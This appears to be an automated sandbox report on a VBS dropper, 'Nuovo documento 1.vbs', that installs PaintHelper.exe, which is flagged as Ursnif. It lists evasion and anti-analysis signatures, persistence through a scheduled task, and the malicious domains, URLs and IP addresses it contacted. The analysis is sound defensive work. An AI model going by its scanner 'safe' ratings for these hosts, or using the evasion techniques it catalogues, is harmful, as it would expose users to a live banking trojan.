Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1720 CREDAT:9474 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1720 CREDAT:75016 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1720 CREDAT:9474 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1720 CREDAT:75016 /prefetch:2Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: Nuovo documento 1.vbsStatic file information: File size 9193427 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\alwaysNote\columnThird\glasseither\lotDetermine\RideAllow\SevenDofinish.pdb source: wscript.exe, 00000000.00000003.667075961.0000023B90C27000.00000004.00000001.sdmp, PaintHelper.exe, 00000004.00000002.947619558.000000000101B000.00000002.00020000.sdmp, PaintHelper.exe.0.dr

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeUnpacked PE file: 4.2.PaintHelper.exe.1000000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeUnpacked PE file: 4.2.PaintHelper.exe.1000000.0.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01001A88 GetModuleHandleW,LoadLibraryW,GetProcAddress,4_2_01001A88
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01001C83 push ecx; ret 4_2_01001C93
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001EB3DF push ecx; ret 4_2_001EB3EF
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01013B77 push ss; iretd 4_2_01013B78
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01011D7D push edi; retf 0036h4_2_01011DEB
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01013D8C push FFFFFFB7h; ret 4_2_01013D94
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_0101179F push ebp; ret 4_2_010117A7
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_010135F7 push eax; iretd 4_2_0101360F
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_010106DD push 008990FFh; ret 4_2_0101068C
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 6.96998335472

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\PaintHelper.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813307095.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809341649.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808887290.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811481573.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813893691.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815804460.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810469443.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814479003.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815608534.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815133508.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812630162.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810128066.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812144693.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816907657.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814943723.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815313978.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811173075.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816721090.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809743965.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815968516.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814703114.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811803755.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816108974.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810838452.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812995480.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816495823.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814184398.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808312503.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816635881.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816822684.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813595381.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4192, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found evasive API chain (date check)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-4628
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\wscript.exe TID: 4448Thread sleep time: -30000s >= -30000sJump to behavior
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01019720 GetSystemInfo,GetModuleFileNameA,OpenMutexA,GetTempPathA,4_2_01019720
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: wscript.exe, 00000000.00000003.666596724.0000023B8E973000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWPK
Source: wscript.exe, 00000000.00000002.672746903.0000023B90A10000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.673420729.0000023B90BAE000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.672746903.0000023B90A10000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.672746903.0000023B90A10000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.672746903.0000023B90A10000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit pointsShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeAPI call chain: ExitProcess graph end nodegraph_4-4231

Anti Debugging:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01001A88 GetModuleHandleW,LoadLibraryW,GetProcAddress,4_2_01001A88
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_01001015 EntryPoint,GetModuleHandleA,GetProcessHeap,GetCurrentThread,WaitForSingleObject,ExitProcess,4_2_01001015

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: PaintHelper.exe.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 89.191.225.207 80Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: PaintHelper.exe, 00000004.00000002.947765171.0000000001050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: PaintHelper.exe, 00000004.00000002.947765171.0000000001050000.00000002.00000001.sdmpBinary or memory string: Progman
Source: PaintHelper.exe, 00000004.00000002.947765171.0000000001050000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: PaintHelper.exe, 00000004.00000002.947765171.0000000001050000.00000002.00000001.sdmpBinary or memory string: =Program Managerb

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001E857D cpuid 4_2_001E857D
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001E83D7 memset,RtlInitializeCriticalSection,GetCurrentProcessId,CloseHandle,GetSystemTimeAsFileTime,4_2_001E83D7
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_001E857D GetUserNameW,4_2_001E857D
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antispywareproduct

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813307095.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809341649.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808887290.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811481573.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813893691.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815804460.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810469443.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814479003.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815608534.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815133508.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812630162.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810128066.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812144693.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816907657.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814943723.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815313978.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811173075.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816721090.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809743965.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815968516.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814703114.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811803755.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816108974.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810838452.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812995480.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816495823.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814184398.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808312503.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816635881.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816822684.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813595381.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4192, type: MEMORY

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813307095.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809341649.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808887290.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811481573.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813893691.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815804460.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810469443.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814479003.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815608534.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815133508.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812630162.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810128066.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812144693.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816907657.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814943723.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815313978.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811173075.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816721090.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.809743965.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.815968516.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814703114.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.811803755.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816108974.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.810838452.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.812995480.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816495823.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.814184398.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.808312503.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816635881.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.816822684.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.813595381.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4192, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
19:51:22API Interceptor2x Sleep call for process: wscript.exe modified
19:51:24Task SchedulerRun new task: jXrjs path: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Nuovo documento 1.vbs8%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\PaintHelper.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\PaintHelper.exe35%VirustotalBrowse

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.2.PaintHelper.exe.1000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
trattoriafiori.xyz4%VirustotalBrowse
primecontentstudios.com3%VirustotalBrowse
site-cdn.onenote.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://primecontentstudios.com/pagigpy75.php?uid=_______Set0%Avira URL Cloudsafe
http://primecontentstudios.com/pagigpy75.php?uid=WW0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://sectigo.com/CPS0B0%VirustotalBrowse
https://sectigo.com/CPS0B0%URL Reputationsafe
http://primecontentstudios.com/pagigpy75.php?uid==0%Avira URL Cloudsafe
https://trattoriafiori.xyz/index.htmRoot0%Avira URL Cloudsafe
http://primecontentstudios.com/3%VirustotalBrowse
http://primecontentstudios.com/0%Avira URL Cloudsafe
https://sectigo.com/CPS0C0%VirustotalBrowse
https://sectigo.com/CPS0C0%URL Reputationsafe
https://trattoriafiori.xyz/index.htm.xyz/index.htm0%Avira URL Cloudsafe
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r1%VirustotalBrowse
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%VirustotalBrowse
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://primecontentstudios.com/pagigpy75.php?uid=8%VirustotalBrowse
http://primecontentstudios.com/pagigpy75.php?uid=0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%VirustotalBrowse
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://primecontentstudios.com/pagigpy75.php?uid=._o0%Avira URL Cloudsafe
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#0%VirustotalBrowse
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#0%URL Reputationsafe
https://trattoriafiori.xyz0%Avira URL Cloudsafe
https://trattoriafiori.xyz/index.htm3%VirustotalBrowse
https://trattoriafiori.xyz/index.htm0%Avira URL Cloudsafe
https://trattoriafiori.xyz/index.htmL20%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.813307095.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.809341649.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.808887290.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000004.00000003.811481573.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              00000004.00000003.813893691.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                00000004.00000003.815804460.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                  00000004.00000003.810469443.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                    00000004.00000003.814479003.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                      00000004.00000003.815608534.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                        00000004.00000003.815133508.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                          00000004.00000003.812630162.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                            00000004.00000003.810128066.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                              00000004.00000003.812144693.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                00000004.00000003.816907657.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                  00000004.00000003.814943723.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                    00000004.00000003.815313978.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                      00000004.00000003.811173075.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                        00000004.00000003.816721090.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                          00000004.00000003.809743965.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                            00000004.00000003.815968516.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                              00000004.00000003.814703114.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                00000004.00000003.811803755.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                  00000004.00000003.816108974.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                    00000004.00000003.810838452.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                      00000004.00000003.812995480.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                        00000004.00000003.816495823.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                          00000004.00000003.814184398.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                            00000004.00000003.808312503.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                              00000004.00000003.816635881.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                                00000004.00000003.816822684.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                                  00000004.00000003.813595381.0000000003680000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                                                                    Process Memory Space: PaintHelper.exe PID: 4192JoeSecurity_UrsnifYara detected UrsnifJoe Security

                                                                      Unpacked PEs

                                                                      No yara matches

                                                                      Sigma Overview

                                                                      No Sigma rule has matched

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      No context

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      unknownhttp://downloadmyinboxhelper.comGet hashmaliciousBrowse
                                                                      • 52.210.2.133
                                                                      https://onedrive.live.com/redir?resid=57A66C00F6A0889D%21174&authkey=%21AFlxjJ8AqLyC7WA&page=View&wd=target%28Quick%20Notes.one%7C413ef381-aa3c-4062-b71e-89358e1bcdfe%2FFOR%20YOUR%20REFERENCE%7C4a278fbe-a14f-4f9f-a8cc-a351162a9dd3%2F%29Get hashmaliciousBrowse
                                                                      • 104.16.132.229
                                                                      DOC014293_2020_04_09.xlsGet hashmaliciousBrowse
                                                                      • 52.114.74.44
                                                                      winlogon.exeGet hashmaliciousBrowse
                                                                      • 185.248.162.102
                                                                      https://1drv.ms/u/s!AjZbJqQuduUdaN8z0dBgPMZd3Ws?e=rZ5iVcGet hashmaliciousBrowse
                                                                      • 173.209.39.29
                                                                      http://groverwy.buzz/WeTransferGet hashmaliciousBrowse
                                                                      • 104.22.45.170
                                                                      coverage_WS974.xlsGet hashmaliciousBrowse
                                                                      • 51.254.58.126
                                                                      coverage_JB324.xlsGet hashmaliciousBrowse
                                                                      • 54.225.71.235
                                                                      DashlaneInst.exeGet hashmaliciousBrowse
                                                                      • 143.204.101.183
                                                                      coverage_MD365.xlsGet hashmaliciousBrowse
                                                                      • 51.254.58.126
                                                                      https://bitly.com/3catlBmGet hashmaliciousBrowse
                                                                      • 178.33.88.78
                                                                      V56hBLPv6K.exeGet hashmaliciousBrowse
                                                                      • 34.193.124.121
                                                                      https://test.mycrowd.jp/?u=cGhpbGxpcF9tYXJrc0BpYW1nb2xkLmNvbQ==Get hashmaliciousBrowse
                                                                      • 157.112.183.57
                                                                      https://linkedincorporatefile.me/recruiter.pdfGet hashmaliciousBrowse
                                                                      • 5.230.65.20
                                                                      http://www.fgoogle.de/mwg-internal/de5fs23hu73ds/files/ACCOR-Collection/js/accor_proxy.jsGet hashmaliciousBrowse
                                                                      • 185.53.179.24
                                                                      yNqNEspMoI.exeGet hashmaliciousBrowse
                                                                      • 35.244.218.203
                                                                      https://melias.se/string/4365850.zipGet hashmaliciousBrowse
                                                                      • 127.0.0.1
                                                                      f_000418.exeGet hashmaliciousBrowse
                                                                      • 77.234.45.9
                                                                      LRU0033987598750980983.vbsGet hashmaliciousBrowse
                                                                      • 15.188.119.127
                                                                      unknownhttp://downloadmyinboxhelper.comGet hashmaliciousBrowse
                                                                      • 52.210.2.133
